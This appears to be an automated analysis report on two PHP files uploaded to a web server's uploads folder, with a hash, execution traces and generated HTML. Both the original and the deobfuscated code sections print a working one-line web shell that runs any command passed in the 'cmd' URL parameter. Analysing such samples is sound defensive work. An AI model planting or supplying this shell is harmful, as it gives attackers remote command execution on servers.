PHP Malware Analysis
indra.php, message2 (2).php
md5: 8b1dedef04348dedfda9521ad2d09a3c
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
Deobfuscated PHP code
<?php
system($_GET['cmd']);Execution traces
data/traces/8b1dedef04348dedfda9521ad2d09a3c_trace-1676239244.8568.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:01:10.754667]
1 0 1 0.000144 393576
1 3 0 0.000183 393160 {main} 1 /var/www/html/uploads/message2 (2).php 0 0
1 3 1 0.000200 393160
0.000226 314264
TRACE END [2023-02-12 20:01:10.754778]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:46:30.885575]
1 0 1 0.000315 393512
1 3 0 0.000368 393088 {main} 1 /var/www/html/uploads/indra.php 0 0
1 3 1 0.000386 393088
0.000417 314224
TRACE END [2023-02-13 01:46:30.885732]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?
system($_GET['cmd']);
?>